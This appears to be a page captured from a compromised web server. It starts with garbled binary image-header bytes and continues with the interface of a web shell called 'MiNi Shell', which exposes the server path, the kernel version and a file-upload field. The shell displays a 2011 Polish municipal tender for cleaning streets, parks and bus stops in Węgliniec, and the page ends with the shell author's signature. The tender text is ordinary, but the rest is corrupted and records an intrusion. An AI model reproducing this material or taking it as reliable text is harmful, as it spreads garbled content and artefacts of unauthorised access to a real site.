JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110216/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110216/54957-N-2011.html

<p class="kh_header"><b>Węgliniec: Utrzymanie czystości na terenie Gminy i Miasta Węgliniec w  2011 roku</b><br>
<b>Numer ogłoszenia: 54957 - 2011; data zamieszczenia: 16.02.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Węgliniec , ul. Sikorskiego 3, 59-940 Węgliniec, woj. dolnośląskie, tel. 075 77 11 435, faks 075 77 12 551.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wegliniec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymanie czystości na terenie Gminy i Miasta Węgliniec w  2011 roku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Usługi w zakresie utrzymania czystości na terenie Gminy i Miasta Węgliniec w 2011 roku obejmują:


WĘGLINIEC
1.PARK MIEJSKI - 14 700 m2
1.1. zamiatanie i odchwaszczanie alejek z kostki brukowej -  nie rzadziej niż 1 raz w miesiącu  - ok. 250 mb,;
1.2.odchwaszczanie i wyrównywanie nawierzchni alejek szutrowych - nie rzadziej niż raz w miesiącu - ok. 400 mb.; 1.3. codzienne zbieranie i usuwanie  nieczystości z terenu całego parku ( w tym gałęzi po wiatrołomach);
1.4. opróżnianie koszy parkowych - 15 szt. - 1 razy w tygodniu,

2.OGRÓDEK JORDANOWSKI przy ul. Kochanowskiego - 1951 m2 i ul.Wojska Polskiego - Kościuszki - 1 961 m2
2.1. codzienne zbieranie i usuwanie nieczystości;
2.2. opróżnianie koszy - 6 szt. - 1 raz w tygodniu,
2.3. odchwaszczanie i wyrównywanie alejek o nawierzchni żwirowej 30 mb - 1 raz w miesiącu

3.ULICE, CHODNIKI, PARKINGI
3.1. zamiatanie piasku, liści i innych nieczystości oraz usuwanie wszelkich przerostów zieleni przy krawężnikach ulicznych, obrzeżach chodnikowych i trawnikowych - zgodnie z wykazem i określona częstotliwością (załącznik nr 1,2,3 do siwz)

4.TEREN  MIASTA
4.1. codzienne zbieranie nieczystości (papiery, folie, butelki itp.) z ulic, chodników, parkingów, trawników, pasów zieleni
4.2. opróżnianie koszy ulicznych - ok. 50 szt. - 1 raz w tygodniu;
4.2. wywieszanie i zdejmowanie  flag ulicznych w wyznaczonym czasie (pięć razy w roku )
4.3. utrzymanie w czystości koszy i ławek ulicznych (dwukrotne mycie - kwiecień i wrzesień). 

5.OBSŁUGA IMPREZ
a) Festyn majowy, Święto Grzybów- w Węglińcu,
b) Noc Świętojańska w Starym Węglińcu,
c) Jagodowe Lato + SIKAWA w Ruszowie, 
d) Festyn w Czerwonej Wodzie .
5.1. instalowanie odpowiedniej ilości koszy i worków na śmieci przed rozpoczęciem imprez, oraz w trakcie trwania imprezy (kosze i worki zapewnia wykonawcy);
5.2. opróżnianie zapełnionych koszy  i worków w trakcie trwania imprez;
5.3. kompleksowe sprzątanie i wywóz odpadów następnego dnia po zakończeniu imprez.

6.PRZYSTANKI AUTOBUSOWE - Węgliniec, Stary Węgliniec, Czerwona Woda, Zielonka, Piaseczna, Jagodzin, Ruszów, Kościelna Wieś 
6.1. codzienne sprzątanie terenu przystanku i zatoki autobusowej w Węglińcu oraz opróżnianie koszy dwa razy w tygodniu - przystanek przy ul. Wojska Polskiego w Węglińcu;
6.2. sprzątanie terenu przystanków i zatok autobusowych oraz opróżnianie koszy dwa razy w tygodniu  (w poniedziałki  i piątki) - pozostałe przystanki;
6.3. usuwanie zbędnych napisów i malowideł z wiat przystankowych;
6.4. mycie wiat przystankowych (3 szt.) wraz z wypolerowaniem szyb -  2 razy w roku (kwiecień, wrzesień)
6.5  w okresie zimowym bieżące odśnieżanie i usuwanie gołoledzi z terenu przystanków , wiat, chodników i zatok autobusowych.

7.WYWÓZ ODPADÓW KOMUNALNYCH  - 1 raz w miesiącu:
7.1. stadion sportowy w Węglińcu, Czerwonej Wodzie i Ruszowie,
7.2. staw tartaczny w Starym Węglińcu;
7.3. staw Balaton w Czerwonej Wodzie;
7.4. staw Tajwan w Węglińcu

8.PLACE ZABAW (ZIELONKA, STARY WĘGLINIEC, JAGODZIN, PIASECZNA) i BOISKA SPORTOWE W ZIELONCE i Starym Węglińcu (przy DK)
8.1. codzienne zbieranie, usuwanie nieczystości
8.2. opróżnianie koszy - 18 szt. - 1 raz w tygodniu

9.TARGOWISKA (Węgliniec, Czerwona Woda, Ruszów, Stary Węgliniec)
9.1. zbieranie i usuwanie nieczystości po zakończonym handlu;
9.2. zamiatanie powierzchni utwardzonych po zakończonym handlu - targowisko w Węglińcu w środy i soboty - targowisko w Czerwonej Wodzie w czwartki;
9.3. wywóz odpadów komunalnych z w/w targowisk (pojemniki zapewnia wykonawca) - co dwa tygodnie - bądź częściej w zależności od stanu zapełnienia pojemników;
9.4. wykaszanie traw i usuwanie chwastów;
9.5. utrzymanie w czystości toalet  - targowisko w Węglińcu i w Czerwonej Wodzie;
9.6.opróżnianie nieczystości ciekłych z TOI TOI w Węglińcu.

RUSZÓW
1.ULICE, CHODNIKI, PARKINGI, SKWERY
1.1.zamiatanie ulic, chodników, parkingu oraz usuwanie przerostów zieleni przy krawężnikach, zgodnie z wykazem i określona częstotliwością (załącznik nr 4, 5, 6 do siwz); 
1.2.codzienne zbieranie i usuwanie nieczystości z w/w terenów;
1.3.opróżnianie koszy ulicznych - 5 szt. - 1 raz w tygodniu;
1.4.skwery  - ul. Żagańska -II Armii Wojska Polskiego, Plac Partyzantów, II Armii Wojska Polskiego 
1.5.codzienne sprzątanie,  opróżnianie koszy - 3 szt. - 1 raz w tygodniu,
1.6.odchwaszczanie, wyrównanie podłoża alejek o nawierzchni szutrowej - nie rzadziej niż raz w miesiącu.


TEREN GMINY
1.POZOSTAŁE PRACE	
1.1.drobne naprawy wiat przystankowych, koszy ulicznych, płotków, ławek oraz ustawianie, mocowanie istniejących znaków drogowych - prace obejmują koszty transportu i robocizny.
1.2.zbieranie nieczystości zgromadzonych przez właścicieli nieruchomości z posprzątanych chodników przyległych do posesji - co 2 tygodnie;
1.3.usuwanie ogłoszeń i reklam z miejsc do tego nieprzystosowanych;
1.4.mycie i dezynfekowanie wszystkich koszy parkowych i ulicznych - dwa razy w roku 
1.5.sprzątanie terenu wokół koszy, przy ławkach, tablicach i słupach ogłoszeniowych


1.	Utrzymanie czystości powinno polegać na  zamieceniu, wygrabieniu, zebraniu wszelkich zanieczyszczeń na jezdniach, parkingach, chodnikach, placach, pasach zieleni, żywopłotach, alejkach, skwerach, w parkach, terenach przy koszach  na śmieci w szczególności  z papierów, resztek roślin, gałązek, liści, niedopałków papierosów, trawy wyrosłej na poboczach dróg oraz wykonaniu wszelkich innych usług nie wymienionych w powyższych załącznikach, a mających na celu bieżące utrzymanie terenów komunalnych objętych niniejszym przedmiotem zamówienia w należytym porządku.
2.	Opróżnianie koszy zależy od ich faktycznego napełnienia i stanu porządku w ich bezpośrednim sąsiedztwie, a zamiatanie ulic i chodników od stanu zabrudzenia oraz potrzeb.
3.	Prace składające się na przedmiot umowy muszą być wykonane zgodnie z obowiązującymi przepisami prawa, a w szczególności z ustawą z dnia 27 kwietnia 2001r. o odpadach (Dz. U. z 2010r., Nr 185, poz. 1243 z późn. zm.), z ustawą z dnia 27 kwietnia 2001r. Prawo Ochrony Środowiska (Dz. U. z 2008r. Nr 25, poz. 150 z późn. zm.) z należytą starannością w ich wykonaniu, dobrą jakością, właściwą organizacja pracy i uzgodnieniami dokonanymi w trakcie realizacji przedmiotu zamówienia.
4.	Za bezpieczeństwo w obrębie odcinka, na którym wykonywane będą prace, odpowiedzialny jest wykonawca.
5.	Przed rozpoczęciem prac Wykonawca sporządzi harmonogram usług na dany miesiąc i przedstawi dla Zamawiającego do zatwierdzenia.
6.	Zakres wykonywanych prac należy skalkulować łącznie z wywozem powstałych w wyniku tych prac nieczystości.
7.	W okresie trwania umowy Wykonawca ma obowiązek zapewnienia stałego kontaktu Zamawiającego z Wykonawcą wskazując numer telefonu celem przyjmowania zgłoszeń przekazywanych przez zamawiającego. 
8.	Wykaz ulic w Węglińcu stanowi załącznik nr 1 do niniejszej SIWZ
9.	Wykaz chodników w Węglińcu  stanowi zał. nr 2 do niniejszej SIWZ.
10.	Wykaz  parkingów  w Węglińcu  stanowi zał. nr 3 do niniejszej SIWZ.
11.	Wykaz ulic w Ruszowie - stanowi załącznik nr 4 do niniejszej SIWZ
12.	Wykaz chodników w Ruszowie - stanowi załącznik nr 5 do niniejszej SIWZ.
13.	Wykaz parkingów w Ruszowie - stanowi załącznik nr 6 do niniejszej SIWZ


1.Zamawiający nie przewiduje zwrotu kosztów udziału w postępowaniu.
2.Rozliczenie usług następować będzie miesięcznymi fakturami VAT za bezusterkowo wykonane prace.
3.Ustala się następujące warunki płatności.
3.1. Wartość umowy nie może zostać podwyższona w drodze aneksu  do niniejszej Umowy. Wartość całkowita przedmiotu umowy nie będzie waloryzowana w okresie realizacji umowy
3.2. Faktura powinna być  adresowana do: Gmina Węgliniec, ul. Sikorskiego 3, 59-940 Węgliniec. NIP - 615-18-08-660.
3.3. Płatność za fakturę VAT będzie dokonana przelewem z konta Zamawiającego na konto Wykonawcy w terminie 30 dni od daty dostarczenia faktury VAT do siedziby Zamawiającego wraz  z podpisanym przez Zamawiającego protokołem bezusterkowego odbioru usług.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających zgodnie z art. 67 ust. 1 pkt. 6 ustawy Prawo zamówień publicznych do 20% wartości zamówienia podstawowego. Zakres zamówień uzupełniających może objąć: utrzymanie czystości i opróżnianie koszy z terenów innych niż  wymienione w przedmiocie zamówienia.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.60.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten spełniają wykonawcy, którzy wykażą, iż dysponują  co najmniej jednym samochodem skrzyniowym lub ciągnikiem z przyczepą.
W przypadku składania oferty wspólnej warunek zostanie uznany przez Zamawiającego za spełniony, jeżeli wykonawcy składający ofertę wspólną będą spełniać go łącznie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>3.	Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zakazuje się zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, z zastrzeżeniem postanowień ust. 2.
2.	Zgodnie z art. 144 ustawy Prawo zamówień publicznych Zamawiający przewiduje zmiany zawartej umowy w zakresie wzrostu/obniżenia wynagrodzenia Wykonawcy w przypadku zmiany stawek podatku dochodowego/lub stawek podatku od towarów i usług. 

3.	Warunkiem wprowadzenia zmian zawartej umowy jest sporządzenie aneksu zmieniającego niniejszą umowę.
4.	Termin powiadomienia o konieczności wprowadzenia zmian w zawartej umowie nie może nastąpić później niż 3 dni od zaistnienia okoliczności uzasadniających zmiany w umowie.
5.	Wszelkie zmiany i uzupełnienia treści umowy muszą mieć formę pisemną pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wegliniec.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy i Miasta Węgliniec
ul.Sikorskiego 3
59  - 940 Węgliniec.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.02.2011 godzina 10:00, miejsce: Urząd Gminy i Miasta Węgliniec
ul.Sikorskiego 3
59  - 940 Węgliniec
Sekretariat - pokój nr 21.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com